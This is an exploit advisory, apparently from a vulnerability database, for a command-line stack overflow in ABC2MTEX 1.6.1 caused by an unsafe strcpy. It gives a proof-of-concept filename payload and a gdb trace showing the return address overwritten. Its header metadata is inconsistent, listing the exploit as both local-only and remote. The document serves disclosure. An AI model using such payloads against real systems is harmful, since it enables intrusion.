ABC2MTEX 1.6.1 Command Line Stack Overflow

2019.08.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <yagemann@gatech.edu> Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on: Debian Buster An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return address from the openIn function by providing a long input filename. This carries similar risk to CVE-2004-1257. Setup: $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz $ tar -xzf abc2mtex1.6.1.tar.gz $ make $ gcc --version gcc (Debian 8.3.0-6) 8.3.0 Copyright (C) 2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. PoC: $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA GDB: We're going to place a breakpoint before and after abc.c:241 to show the overflow. $ gdb -q ./abc2mtex Reading symbols from ./abc2mtex...done. (gdb) break abc.c:241 Breakpoint 1 at 0x4139: file abc.c, line 241. (gdb) break abc.c:242 Breakpoint 2 at 0x414c: file abc.c, line 242. (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 241 (void) strcpy(savename,filename); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 #1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273 (gdb) c Continuing. Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 242 (void) strcat(filename,".abc"); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 #1 0x0000414243444546 in ?? () #2 0x00007fffffffe4f8 in ?? () #3 0x0000000200000000 in ?? () #4 0x0000000000000000 in ?? () (gdb) c Continuing. file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist Program received signal SIGSEGV, Segmentation fault. 0x0000414243444546 in ?? () (gdb) quit


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top